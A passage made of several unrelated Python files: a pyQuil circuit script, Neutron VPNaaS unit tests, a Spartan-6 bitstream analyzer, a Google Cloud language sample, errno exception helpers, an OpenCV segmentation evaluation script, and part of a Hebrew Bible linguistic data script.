prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += H(0) # number=5
prog += H(1) # number=6
prog += H(2) # number=7
prog += H(3) # number=8
prog += Y(1) # number=19
prog += H(0) # number=9
prog += Y(2) # number=10
prog += Y(2) # number=11
prog += Y(3) # number=20
prog += Y(1) # number=12
prog += RX(-2.158274153016188,3) # number=24
prog += H(0) # number=16
prog += CZ(2,0) # number=17
prog += H(0) # number=18
prog += CNOT(1,0) # number=21
prog += Z(1) # number=22
prog += H(0) # number=28
prog += CZ(1,0) # number=29
prog += H(0) # number=30
prog += H(0) # number=25
prog += CZ(2,0) # number=26
prog += H(0) # number=27
# circuit end
return prog
def summarise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil1973.csv","w")
print(summarise_results(bitstrings), file=writefile)
writefile.close()
|
from .file import read_files, write_files
|
# Copyright 2013, Nachi Ueno, NTT I3, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import mock
from neutron.common import constants
from neutron import context
from neutron import manager
from neutron.plugins.common import constants as p_constants
from neutron.tests.unit.db.vpn import test_db_vpnaas
from neutron.tests.unit.openvswitch import test_agent_scheduler
from neutron.tests.unit import test_agent_ext_plugin
from neutron_vpnaas.db.vpn import vpn_validator
from neutron_vpnaas.services.vpn.service_drivers import ipsec as ipsec_driver
FAKE_HOST = test_agent_ext_plugin.L3_HOSTA
VPN_DRIVER_CLASS = 'neutron.services.vpn.plugin.VPNDriverPlugin'
class TestVPNDriverPlugin(test_db_vpnaas.TestVpnaas,
test_agent_scheduler.AgentSchedulerTestMixIn,
test_agent_ext_plugin.AgentDBTestMixIn):
def setUp(self):
self.adminContext = context.get_admin_context()
driver_cls_p = mock.patch(
'neutron.services.vpn.'
'service_drivers.ipsec.IPsecVPNDriver')
driver_cls = driver_cls_p.start()
self.driver = mock.Mock()
self.driver.service_type = ipsec_driver.IPSEC
self.driver.validator = vpn_validator.VpnReferenceValidator()
driver_cls.return_value = self.driver
super(TestVPNDriverPlugin, self).setUp(
vpnaas_plugin=VPN_DRIVER_CLASS)
def test_create_ipsec_site_connection(self, **extras):
super(TestVPNDriverPlugin, self).test_create_ipsec_site_connection()
self.driver.create_ipsec_site_connection.assert_called_once_with(
mock.ANY, mock.ANY)
self.driver.delete_ipsec_site_connection.assert_called_once_with(
mock.ANY, mock.ANY)
def test_delete_vpnservice(self, **extras):
super(TestVPNDriverPlugin, self).test_delete_vpnservice()
self.driver.delete_vpnservice.assert_called_once_with(
mock.ANY, mock.ANY)
def test_update_vpnservice(self, **extras):
super(TestVPNDriverPlugin, self).test_update_vpnservice()
self.driver.update_vpnservice.assert_called_once_with(
mock.ANY, mock.ANY, mock.ANY)
@contextlib.contextmanager
def vpnservice_set(self):
"""Test case to create a ipsec_site_connection."""
vpnservice_name = "vpn1"
ipsec_site_connection_name = "ipsec_site_connection"
ikename = "ikepolicy1"
ipsecname = "ipsecpolicy1"
description = "my-vpn-connection"
keys = {'name': vpnservice_name,
'description': "my-vpn-connection",
'peer_address': '192.168.1.10',
'peer_id': '192.168.1.10',
'peer_cidrs': ['192.168.2.0/24', '192.168.3.0/24'],
'initiator': 'bi-directional',
'mtu': 1500,
'dpd_action': 'hold',
'dpd_interval': 40,
'dpd_timeout': 120,
'tenant_id': self._tenant_id,
'psk': 'abcd',
'status': 'PENDING_CREATE',
'admin_state_up': True}
with self.ikepolicy(name=ikename) as ikepolicy:
with self.ipsecpolicy(name=ipsecname) as ipsecpolicy:
with self.subnet() as subnet:
with self.router() as router:
plugin = manager.NeutronManager.get_plugin()
agent = {'host': FAKE_HOST,
'agent_type': constants.AGENT_TYPE_L3,
'binary': 'fake-binary',
'topic': 'fake-topic'}
plugin.create_or_update_agent(self.adminContext, agent)
plugin.schedule_router(
self.adminContext, router['router']['id'])
with self.vpnservice(name=vpnservice_name,
subnet=subnet,
router=router) as vpnservice1:
keys['ikepolicy_id'] = ikepolicy['ikepolicy']['id']
keys['ipsecpolicy_id'] = (
ipsecpolicy['ipsecpolicy']['id']
)
keys['vpnservice_id'] = (
vpnservice1['vpnservice']['id']
)
with self.ipsec_site_connection(
self.fmt,
ipsec_site_connection_name,
keys['peer_address'],
keys['peer_id'],
keys['peer_cidrs'],
keys['mtu'],
keys['psk'],
keys['initiator'],
keys['dpd_action'],
keys['dpd_interval'],
keys['dpd_timeout'],
vpnservice1,
ikepolicy,
ipsecpolicy,
keys['admin_state_up'],
description=description,
):
yield vpnservice1['vpnservice']
def test_get_agent_hosting_vpn_services(self):
with self.vpnservice_set():
service_plugin = manager.NeutronManager.get_service_plugins()[
p_constants.VPN]
vpnservices = service_plugin._get_agent_hosting_vpn_services(
self.adminContext, FAKE_HOST)
vpnservices = vpnservices.all()
self.assertEqual(1, len(vpnservices))
vpnservice_db = vpnservices[0]
self.assertEqual(1, len(vpnservice_db.ipsec_site_connections))
ipsec_site_connection = vpnservice_db.ipsec_site_connections[0]
self.assertIsNotNone(
ipsec_site_connection['ikepolicy'])
self.assertIsNotNone(
ipsec_site_connection['ipsecpolicy'])
def test_update_status(self):
with self.vpnservice_set() as vpnservice:
self._register_agent_states()
service_plugin = manager.NeutronManager.get_service_plugins()[
p_constants.VPN]
service_plugin.update_status_by_agent(
self.adminContext,
[{'status': 'ACTIVE',
'ipsec_site_connections': {},
'updated_pending_status': True,
'id': vpnservice['id']}])
vpnservices = service_plugin._get_agent_hosting_vpn_services(
self.adminContext, FAKE_HOST)
vpnservice_db = vpnservices[0]
self.assertEqual(p_constants.ACTIVE, vpnservice_db['status'])
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017-2020 The Project X-Ray Authors.
#
# Use of this source code is governed by a ISC-style
# license that can be found in the LICENSE file or at
# https://opensource.org/licenses/ISC
#
# SPDX-License-Identifier: ISC
'''
Spartan 6 bitstream analyzer tool.
This script reads a Spartan6 bitstream and prints out some useful information.
It can also create a frames file with the configuration data words.
The bitstream is analyzed word by word and interpreted according to
the UG380 Configuration User Guide.
The tool can be used to derive the initialization, startup and finalization
sequence as well as the configuration data. The latter is written to a frames
file which can be used by the bitstream tools such as frames2bit to generate
a valid bitstream.
'''
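# Example invocation (hypothetical file names, shown for illustration only):
#   python3 <this script> --bitstream top.bit --frames_out top.frames
# It writes the configuration words to top.frames and, unless --silent is given,
# also prints the decoded packet stream and writes top.frames.txt alongside it.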
import argparse
from io import StringIO
conf_regs = {
0: "CRC",
1: "FAR_MAJ",
2: "FAR_MIN",
3: "FDRI",
4: "FDRO",
5: "CMD",
6: "CTL",
7: "MASK",
8: "STAT",
9: "LOUT",
10: "COR1",
11: "COR2",
12: "PWRDN_REG",
13: "FLR",
14: "IDCODE",
15: "CWDT",
16: "HC_OPT_REG",
18: "CSBO",
19: "GENERAL1",
20: "GENERAL2",
21: "GENERAL3",
22: "GENERAL4",
23: "GENERAL5",
24: "MODE_REG",
25: "PU_GWE",
26: "PU_GTS",
27: "MFWR",
28: "CCLK_FREQ",
29: "SEU_OPT",
30: "EXP_SIGN",
31: "RDBK_SIGN",
32: "BOOTSTS",
33: "EYE_MASK",
34: "CBC_REG"
}
cmd_reg_codes = {
0: "NULL",
1: "WCFG",
2: "MFW",
3: "LFRM",
4: "RCFG",
5: "START",
7: "RCRC",
8: "AGHIGH",
10: "GRESTORE",
11: "SHUTDOWN",
13: "DESYNC",
14: "IPROG"
}
opcodes = ("NOP", "READ", "WRITE", "UNKNOWN")
def KnuthMorrisPratt(text, pattern):
'''
Yields all starting positions of copies of the pattern in the text.
Calling conventions are similar to string.find, but its arguments can be
lists or iterators, not just strings, it returns all matches, not just
the first one, and it does not need the whole text in memory at once.
Whenever it yields, it will have read the text exactly up to and including
the match that caused the yield.
'''
# allow indexing into pattern and protect against change during yield
pattern = list(pattern)
# build table of shift amounts
shifts = [1] * (len(pattern) + 1)
shift = 1
for pos in range(len(pattern)):
while shift <= pos and pattern[pos] != pattern[pos - shift]:
shift += shifts[pos - shift]
shifts[pos + 1] = shift
# do the actual search
startPos = 0
matchLen = 0
for c in text:
while matchLen == len(pattern) or \
matchLen >= 0 and pattern[matchLen] != c:
startPos += shifts[matchLen]
matchLen -= shifts[matchLen]
matchLen += 1
if matchLen == len(pattern):
yield startPos
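# Minimal illustration of the generator above (ad-hoc values, not from the
# original source): list(KnuthMorrisPratt([1, 2, 1, 2, 3, 1, 2], [1, 2]))
# yields the start positions [0, 2, 5]. Below it is used to locate the
# 0xAA 0x99 0x55 0x66 sync word that marks the start of the bitstream body.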
class Bitstream:
def __init__(self, file_name, verbose=False):
self.frame_data = []
self.idcode = 0
self.exp_sign = 0
self.far_min = 0
self.far_maj = 0
self.curr_fdri_write_len = 0
self.curr_crc_check = 0
self.fdri_in_progress = False
with open(file_name, "rb") as f:
self.bytes = f.read()
pos, self.header = self.get_header()
self.body = [
(i << 8) | j
for i, j in zip(self.bytes[pos::2], self.bytes[pos + 1::2])
]
self.parse_bitstream(verbose)
def get_header(self):
pos = next(KnuthMorrisPratt(self.bytes, [0xaa, 0x99, 0x55, 0x66]))
return pos + 4, self.bytes[:pos + 4]
def parse_bitstream(self, verbose):
payload_len = 0
for word in self.body:
if payload_len > 0:
if verbose:
print("\tWord: ", hex(word))
payload_len = self.parse_reg(
reg_addr, word, payload_len, verbose)
continue
else:
packet_header = self.parse_packet_header(word)
opcode = packet_header["opcode"]
reg_addr = packet_header["reg_addr"]
words = packet_header["word_count"]
type = packet_header["type"]
if verbose:
print(
"\tWord: ", hex(word),
'Type: {}, Op: {}, Addr: {}, Words: {}'.format(
type, opcodes[opcode], reg_addr, words))
if opcode and reg_addr in conf_regs:
payload_len = words
continue
def parse_packet_header(self, word):
type = (word >> 13) & 0x7
opcode = (word >> 11) & 0x3
reg_addr = (word >> 5) & 0x3F
if type == 1:
word_count = word & 0x1F
elif type == 2:
word_count = 2
else:
word_count = 0
return {
"type": type,
"opcode": opcode,
"reg_addr": reg_addr,
"word_count": word_count
}
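# Worked example based purely on the bit fields decoded above (the value is
# invented for illustration): parse_packet_header(0x30A1) gives type 1, a
# WRITE opcode, register address 5 (CMD) and a word count of 1.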
def parse_command(self, word):
return cmd_reg_codes[word]
def parse_cor1(self, word):
return word
def parse_cor2(self, word):
return word
def parse_ctl(self, word):
#decryption
dec = (word >> 6) & 1
#security bits
sb = (word >> 4) & 3
#persist
p = (word >> 3) & 1
#use efuse
efuse = (word >> 2) & 1
#crc extstat disable
crc = (word >> 1) & 1
return {
"decryption": dec,
"security bits": sb,
"pesist": p,
"use efuse": efuse,
"crc extstat disable": crc
}
def parse_cclk_freq(self, word):
ext_mclk = (word >> 14) & 1
mclk_freq = word & 0x3FF
return (ext_mclk, mclk_freq)
def parse_pwrdn(self, word):
en_eyes = (word >> 14) & 1
filter_b = (word >> 5) & 1
en_pgsr = (word >> 4) & 1
en_pwrdn = (word >> 2) & 1
keep_sclk = word & 1
return {
"en_eyes": en_eyes,
"filter_b": filter_b,
"en_pgsr": en_pgsr,
"en_pwrdn": en_pwrdn,
"keep_sclk": keep_sclk
}
def parse_eye_mask(self, word):
return word & 0xFF
def parse_hc_opt(self, word):
return (word >> 6) & 1
def parse_cwdt(self, word):
return word
def parse_pu_gwe(self, word):
return word & 0x3FF
def parse_pu_gts(self, word):
return word & 0x3FF
def parse_mode(self, word):
new_mode = (word >> 13) & 0x1
buswidth = (word >> 11) & 0x3
bootmode = (word >> 8) & 0x7
bootvsel = word & 0xFF
return {
"new_mode": new_mode,
"buswidth": buswidth,
"bootmode": bootmode,
"bootvsel": bootvsel
}
def parse_seu(self, word):
seu_freq = (word >> 4) & 0x3FF
seu_run_on_err = (word >> 3) & 0x1
glut_mask = (word >> 1) & 0x1
seu_enable = word & 0x1
return {
"seu_freq": seu_freq,
"seu_run_on_err": seu_run_on_err,
"glut_mask": glut_mask,
"seu_enable": seu_enable
}
def parse_reg(self, reg_addr, word, payload_len, verbose):
reg = conf_regs[reg_addr]
if reg == "CMD":
command = self.parse_command(word)
if verbose:
print("Command: {}\n".format(command))
elif reg == "FLR":
frame_length = word
if verbose:
print("Frame length: {}\n".format(frame_length))
elif reg == "COR1":
conf_options = self.parse_cor1(word)
if verbose:
print("COR1 options: {}\n".format(conf_options))
elif reg == "COR2":
conf_options = self.parse_cor2(word)
if verbose:
print("COR2 options: {}\n".format(conf_options))
elif reg == "IDCODE":
assert payload_len < 3
if payload_len == 2:
self.idcode = word << 16
elif payload_len == 1:
self.idcode |= word
if verbose:
print("IDCODE: {}\n".format(hex(self.idcode)))
elif reg == "MASK":
mask = word
if verbose:
print("Mask value: {}\n".format(mask))
elif reg == "CTL":
ctl_options = self.parse_ctl(word)
if verbose:
print("CTL options: {}\n".format(ctl_options))
elif reg == "CCLK_FREQ":
cclk_freq_options = self.parse_cclk_freq(word)
if verbose:
print("CCLK_FREQ options: {}\n".format(cclk_freq_options))
elif reg == "PWRDN_REG":
suspend_reg_options = self.parse_pwrdn(word)
if verbose:
print("{} options: {}\n".format(reg, suspend_reg_options))
elif reg == "EYE_MASK":
eye_mask = self.parse_eye_mask(word)
if verbose:
print("{} options: {}\n".format(reg, eye_mask))
elif reg == "HC_OPT_REG":
hc_options = self.parse_hc_opt(word)
if verbose:
print("{} options: {}\n".format(reg, hc_options))
elif reg == "CWDT":
cwdt_options = self.parse_cwdt(word)
if verbose:
print("{} options: {}\n".format(reg, cwdt_options))
elif reg == "PU_GWE":
pu_gwe_sequence = self.parse_pu_gwe(word)
if verbose:
print("{} options: {}\n".format(reg, pu_gwe_sequence))
elif reg == "PU_GTS":
pu_gts_sequence = self.parse_pu_gts(word)
if verbose:
print("{} options: {}\n".format(reg, pu_gts_sequence))
elif reg == "MODE_REG":
mode_options = self.parse_mode(word)
if verbose:
print("{} options: {}\n".format(reg, mode_options))
elif reg == "GENERAL1" or reg == "GENERAL2" \
or reg == "GENERAL3" or reg == "GENERAL4" \
or reg == "GENERAL5":
general_options = word
if verbose:
print("{} options: {}\n".format(reg, general_options))
elif reg == "SEU_OPT":
seu_options = self.parse_seu(word)
if verbose:
print("{} options: {}\n".format(reg, seu_options))
elif reg == "EXP_SIGN":
if payload_len == 2:
self.exp_sign = word << 16
elif payload_len == 1:
self.exp_sign |= word
if verbose:
print("{}: {}\n".format(reg, self.exp_sign))
elif reg == "FAR_MAJ":
if payload_len == 2:
self.far_maj = word
elif payload_len == 1:
self.far_min = word
if verbose:
print(
"{}: {} FAR_MIN: {}\n".format(
reg, self.far_maj, self.far_min))
elif reg == "FDRI":
if self.fdri_in_progress:
self.frame_data.append(word)
if payload_len == 1:
self.fdri_in_progress = False
return 0
elif payload_len == 2:
self.curr_fdri_write_len = (word & 0xFFF) << 16
elif payload_len == 1:
self.curr_fdri_write_len |= word
self.fdri_in_progress = True
# Check if 0 words actually means read something
payload_len = self.curr_fdri_write_len + 2
if verbose:
print("{}: {}\n".format(reg, self.curr_fdri_write_len))
return payload_len
elif reg == "CRC":
if payload_len == 2:
self.curr_crc_check = (word & 0xFFF) << 16
elif payload_len == 1:
self.curr_crc_check |= word
if verbose:
print("{}: {}\n".format(reg, self.curr_crc_check))
payload_len -= 1
return payload_len
def write_frames_txt(self, file_name):
'''Write frame data in a more readable format'''
frame_stream = StringIO()
for i in range(len(self.frame_data)):
if i % 65 == 0:
frame_stream.write("\nFrame {:4}\n".format(i // 65))
#IOB word
if i % 65 == 32:
frame_stream.write(
"\n#{:3}:{:6}\n".format(i % 65, hex(self.frame_data[i])))
else:
frame_stream.write(
"#{:3}:{:6},".format(i % 65, hex(self.frame_data[i])))
with open(file_name, "w") as f:
print(frame_stream.getvalue(), file=f)
def write_frames(self, file_name):
'''Write configuration data to frames file'''
frame_stream = StringIO()
for i in range(len(self.frame_data)):
if i % 65 == 0:
frame_stream.write("0x{:08x} ".format(i // 65))
frame_stream.write("0x{:04x}".format(self.frame_data[i]))
if i % 65 == 64:
frame_stream.write("\n")
elif i < len(self.frame_data) - 1:
frame_stream.write(",")
with open(file_name, "w") as f:
print(frame_stream.getvalue(), file=f)
def main(args):
verbose = not args.silent
bitstream = Bitstream(args.bitstream, verbose)
print("Frame data length: ", len(bitstream.frame_data))
if args.frames_out:
bitstream.write_frames(args.frames_out)
if verbose:
bitstream.write_frames_txt(args.frames_out + ".txt")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--bitstream', help='Input bitstream')
parser.add_argument('--frames_out', help='Output frames file')
parser.add_argument(
'--silent', help="Don't print analysis details", action='store_true')
args = parser.parse_args()
main(args)
|
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# DO NOT EDIT! This is a generated sample ("Request", "language_entities_text")
# To install the latest published package dependency, execute the following:
# pip install google-cloud-language
import sys
# [START language_entities_text]
from google.cloud import language_v1
from google.cloud.language_v1 import enums
import six
def sample_analyze_entities(text_content):
"""Analyze entities in text"""
# [START language_entities_text_core]
client = language_v1.LanguageServiceClient()
# text_content = 'California is a state.'
if isinstance(text_content, six.binary_type):
text_content = text_content.decode('utf-8')
type_ = enums.Document.Type.PLAIN_TEXT
document = {'type': type_, 'content': text_content}
response = client.analyze_entities(document)
for entity in response.entities:
print('Entity name: {}'.format(entity.name))
print('Entity type: {}'.format(enums.Entity.Type(entity.type).name))
print('Entity salience score: {}'.format(entity.salience))
for mention in entity.mentions:
print('Mention: {}'.format(mention.text.content))
print('Mention type: {}'.format(
enums.EntityMention.Type(mention.type).name))
# [END language_entities_text_core]
# [END language_entities_text]
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
'--text_content', type=str, default='California is a state.')
args = parser.parse_args()
sample_analyze_entities(args.text_content)
if __name__ == '__main__':
main()
|
"""
create errno-specific classes for IO or os calls.
"""
import sys, os, errno
class Error(EnvironmentError):
def __repr__(self):
return "%s.%s %r: %s " %(self.__class__.__module__,
self.__class__.__name__,
self.__class__.__doc__,
" ".join(map(str, self.args)),
#repr(self.args)
)
def __str__(self):
s = "[%s]: %s" %(self.__class__.__doc__,
" ".join(map(str, self.args)),
)
return s
_winerrnomap = {
2: errno.ENOENT,
3: errno.ENOENT,
17: errno.EEXIST,
13: errno.EBUSY, # empty cd drive, but ENOMEDIUM seems unavailable
22: errno.ENOTDIR,
267: errno.ENOTDIR,
5: errno.EACCES, # anything better?
}
class ErrorMaker(object):
""" lazily provides Exception classes for each possible POSIX errno
(as defined per the 'errno' module). All such instances
subclass EnvironmentError.
"""
Error = Error
_errno2class = {}
def __getattr__(self, name):
if name[0] == "_":
raise AttributeError(name)
eno = getattr(errno, name)
cls = self._geterrnoclass(eno)
setattr(self, name, cls)
return cls
def _geterrnoclass(self, eno):
try:
return self._errno2class[eno]
except KeyError:
clsname = errno.errorcode.get(eno, "UnknownErrno%d" %(eno,))
errorcls = type(Error)(clsname, (Error,),
{'__module__':'py.error',
'__doc__': os.strerror(eno)})
self._errno2class[eno] = errorcls
return errorcls
def checked_call(self, func, *args, **kwargs):
""" call a function and raise an errno-exception if applicable. """
__tracebackhide__ = True
try:
return func(*args, **kwargs)
except self.Error:
raise
except EnvironmentError:
cls, value, tb = sys.exc_info()
if not hasattr(value, 'errno'):
raise
__tracebackhide__ = False
errno = value.errno
try:
if not isinstance(value, WindowsError):
raise NameError
except NameError:
# we are not on Windows, or we got a proper OSError
cls = self._geterrnoclass(errno)
else:
try:
cls = self._geterrnoclass(_winerrnomap[errno])
except KeyError:
raise value
raise cls("%s%r" % (func.__name__, args))
__tracebackhide__ = True
error = ErrorMaker()
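# Usage sketch for the singleton above (illustrative, not from the original
# module): error.checked_call(os.rmdir, "/no/such/dir") raises error.ENOENT,
# a lazily created subclass of Error whose docstring is os.strerror(errno.ENOENT).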
|
import numpy as np
import sys
import os
import fnmatch
import argparse
try:
import cv2 as cv
except ImportError:
raise ImportError('Can\'t find OpenCV Python module. If you\'ve built it from sources without installation, '
'configure environment variable PYTHONPATH to "opencv_build_dir/lib" directory (with "python3" subdirectory if required)')
try:
import torch
except ImportError:
raise ImportError('Can\'t find pytorch. Please install it by following instructions on the official site')
from torch.utils.serialization import load_lua
from pascal_semsegm_test_fcn import eval_segm_result, get_conf_mat, get_metrics, DatasetImageFetch, SemSegmEvaluation
from imagenet_cls_test_alexnet import Framework, DnnCaffeModel
class NormalizePreproc:
def __init__(self):
pass
@staticmethod
def process(img):
image_data = np.array(img).transpose(2, 0, 1).astype(np.float32)
image_data = np.expand_dims(image_data, 0)
image_data /= 255.0
return image_data
class CityscapesDataFetch(DatasetImageFetch):
img_dir = ''
segm_dir = ''
segm_files = []
colors = []
i = 0
def __init__(self, img_dir, segm_dir, preproc):
self.img_dir = img_dir
self.segm_dir = segm_dir
self.segm_files = sorted([img for img in self.locate('*_color.png', segm_dir)])
self.colors = self.get_colors()
self.data_prepoc = preproc
self.i = 0
@staticmethod
def get_colors():
result = []
colors_list = (
(0, 0, 0), (128, 64, 128), (244, 35, 232), (70, 70, 70), (102, 102, 156), (190, 153, 153), (153, 153, 153),
(250, 170, 30), (220, 220, 0), (107, 142, 35), (152, 251, 152), (70, 130, 180), (220, 20, 60), (255, 0, 0),
(0, 0, 142), (0, 0, 70), (0, 60, 100), (0, 80, 100), (0, 0, 230), (119, 11, 32))
for c in colors_list:
result.append(DatasetImageFetch.pix_to_c(c))
return result
def __iter__(self):
return self
def next(self):
if self.i < len(self.segm_files):
segm_file = self.segm_files[self.i]
segm = cv.imread(segm_file, cv.IMREAD_COLOR)[:, :, ::-1]
segm = cv.resize(segm, (1024, 512), interpolation=cv.INTER_NEAREST)
img_file = self.rreplace(self.img_dir + segm_file[len(self.segm_dir):], 'gtFine_color', 'leftImg8bit')
assert os.path.exists(img_file)
img = cv.imread(img_file, cv.IMREAD_COLOR)[:, :, ::-1]
img = cv.resize(img, (1024, 512))
self.i += 1
gt = self.color_to_gt(segm, self.colors)
img = self.data_prepoc.process(img)
return img, gt
else:
self.i = 0
raise StopIteration
def get_num_classes(self):
return len(self.colors)
@staticmethod
def locate(pattern, root_path):
for path, dirs, files in os.walk(os.path.abspath(root_path)):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(path, filename)
@staticmethod
def rreplace(s, old, new, occurrence=1):
li = s.rsplit(old, occurrence)
return new.join(li)
class TorchModel(Framework):
net = object
def __init__(self, model_file):
self.net = load_lua(model_file)
def get_name(self):
return 'Torch'
def get_output(self, input_blob):
tensor = torch.FloatTensor(input_blob)
out = self.net.forward(tensor).numpy()
return out
class DnnTorchModel(DnnCaffeModel):
net = cv.dnn.Net()
def __init__(self, model_file):
self.net = cv.dnn.readNetFromTorch(model_file)
def get_output(self, input_blob):
self.net.setBlob("", input_blob)
self.net.forward()
return self.net.getBlob(self.net.getLayerNames()[-1])
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--imgs_dir", help="path to Cityscapes validation images dir, imgsfine/leftImg8bit/val")
parser.add_argument("--segm_dir", help="path to Cityscapes dir with segmentation, gtfine/gtFine/val")
parser.add_argument("--model", help="path to torch model, download it here: "
"https://www.dropbox.com/sh/dywzk3gyb12hpe5/AAD5YkUa8XgMpHs2gCRgmCVCa")
parser.add_argument("--log", help="path to logging file")
args = parser.parse_args()
prep = NormalizePreproc()
df = CityscapesDataFetch(args.imgs_dir, args.segm_dir, prep)
fw = [TorchModel(args.model),
DnnTorchModel(args.model)]
segm_eval = SemSegmEvaluation(args.log)
segm_eval.process(fw, df)
|
import re
import sys
import csv
import json
import pickle
import collections
from pathlib import Path
from tf.fabric import Fabric
from book_formats import get_book_maps, etcbc2sbl, etcbc2abbr
from verb_form import get_verbform, get_cl_verbform
from modify_domain import permissive_q
from synvar_carc import in_dep_calc as clause_relator
from modify_cltype import simplify_cl_type
from tag_args import clause_objects, get_loca_assocs, clause_locas, clause_time, clause_args
# NB: the working directory when this script is executed is
# /workflow; because we have some utilities that we want
# to run from a directory above it, we need to append it to the path
sys.path.append('scripts')
from build_tables import build_sample_tables
# fire up Text-Fabric with BHSA data
TF = Fabric(snakemake.input['tf_mods'], silent='deep')
features = """
sp pdp vs vt ps gn nu
lex language gloss voc_lex voc_lex_utf8
function number label
typ code rela mother domain txt
genre
sense
nhead
funct_assoc
"""
bhsa = TF.load(features, silent='deep')
F, E, T, L, Fs, = bhsa.F, bhsa.E, bhsa.T, bhsa.L, bhsa.Fs
# load GBI Hebrew data
with open(snakemake.input.bhsa2gbi, 'rb') as infile:
bhsa2gbi = pickle.load(infile)
# preprocess data
bookmap = get_book_maps(bhsa)
loca_lexs = get_loca_assocs(bhsa)
def join_on(nodes, jchar='_', default=''):
"""Join words on a char and ensure they are pre/appended with that char.
The pre/appending provides easy-to-match word boundaries.
"""
joined_string = f'{jchar}'.join(nodes)
if not joined_string:
return default
else:
return f'{jchar}{joined_string}{jchar}'
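# For example (derived from the definition above): join_on(['A', 'B']) returns
# '_A_B_', while join_on([]) returns the default ''.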
def get_preceding_words(node, context='clause'):
"""Retrieves words from before a verb within a context"""
context_node = L.u(node, context)[0]
context_words = L.d(context_node, 'word')
prec_words = context_words[:context_words.index(node)]
return prec_words
def main_row(node):
"""Compile all relevant BHSA data for a given node."""
# data on this clause itself
book, chapter, verse = T.sectionFromNode(node)
booksbl = etcbc2sbl[book]
bookabbr = etcbc2abbr[book]
ref_string = f'{book} {chapter}:{verse}'
ref_sbl = f'{booksbl} {chapter}:{verse}'
ref_abbr = f'{bookabbr} {chapter}:{verse}'
verse_node = L.u(node, 'verse')[0]
clause_atom = L.u(node, 'clause_atom')[0]
clause = L.u(node, 'clause')[0]
sent = L.u(node, 'sentence')[0]
clause_type = F.typ.v(clause)
preceding_words = get_preceding_words(node)
prec_lexes = join_on((F.lex.v(w) for w in preceding_words), default='Ø')
prec_pos = join_on((F.pdp.v(w) for w in preceding_words), default='Ø')
domain2 = permissive_q(clause, bhsa)
verbform = get_verbform(node, bhsa, bhsa2gbi)
cl_type_simp = simplify_cl_type(clause_atom, prec_lexes, bhsa)
# work around for participle contexts without
# clause data
if verbform == 'ptcp' and clause_type != 'Ptcp':
cl_args = None
has_q = None
do_clause = False
else:
do_clause = True
cl_args = clause_args(node, bhsa)
has_q = ('Q' in cl_args) * 1 # look for question particles
cl_args = re.match('.*V', cl_args)[0] # NB ignore post-verbal arguments
# collect preceding particles only
particle_types = {'nega', 'advb', 'prep', 'conj', 'prde', 'prin', 'intj', 'inrg'}
prec_particles = join_on(
(F.lex.v(w) for w in preceding_words
if F.pdp.v(w) in particle_types)
, default='Ø')
null_string = ''
row_data = {
'bhsa_node': node,
'ref': ref_string,
'book': book,
'book_super': bookmap['super'].get(book, book),
'canon_part': bookmap['tripart'][book],
'period': bookmap['period'].get(book, ''),
'genre': F.genre.v(verse_node),
'domain2': domain2,
'text_full': F.g_word_utf8.v(node),
'text_plain': F.g_cons_utf8.v(node),
'lex': F.lex_utf8.v(node),
'lex_etcbc': F.lex.v(node),
'gloss': F.gloss.v(node),
'verb_form': verbform,
'stem': F.vs.v(node),
'person': F.ps.v(node),
'gender': F.gn.v(node),
'number': F.nu.v(node),
'valence': F.sense.v(node),
'clause_atom': T.text(clause_atom),
'clause': T.text(clause),
'verse': T.text(verse_node),
'sentence': T.text(sent),
'txt_type': F.txt.v(clause),
'clause_type': clause_type,
'cltype_simp': cl_type_simp,
'clause_rela': clause_relator(clause, bhsa),
'cl_args': cl_args,
'is_question': has_q,
'prec_lexes': prec_lexes,
'prec_pos': prec_pos,
'prec_part': prec_particles,
'ref_sbl': ref_sbl,
'ref_abbr': ref_abbr,
}
if do_clause:
# provide clause argument data
# objects
row_data.update(
clause_objects(node, clause_atom, clause, bhsa)
)
# locatives
row_data.update(
clause_locas(node, loca_lexs, bhsa)
)
row_data.update(
clause_time(node, bhsa)
)
# convert to boolean 0 or 1 to avoid indexing
# pivot tables with booleans
row_data['has_objc'] = 1 * row_data['has_objc']
row_data['has_loca'] = 1 * row_data['has_loca']
return row_data
def nearby_clatom_data(clatom_lookup, starting_clatom):
"""Retrieve data on a nearby clause_atom, if it exists
Args:
clatom_lookup: iterable of clause_atom nodes or empty
Returns:
dict of data on the first clause_atom in the lookup, if
one was found, else an empty dict
"""
rel_dat = {
'clause':'', 'cl_atom': '', 'clause_atom':'',
'rela': '', 'domain2': '', 'verbtype': '',
'type': '', 'verb_ps': '', 'verb_lex': '',
'verbplain': '', 'intertext': ''
}
# retrieve data on the first clause in the lookup, if there is one
if clatom_lookup:
cl_atom = rel_dat['cl_atom'] = clatom_lookup[0]
cl = L.u(cl_atom, 'clause')[0]
verb = next((w for w in L.d(cl_atom, 'word') if F.pdp.v(w) == 'verb'), 0)
rel_dat['verb_lex'] = F.lex.v(verb)
rel_dat['verb_ps'] = F.ps.v(verb)
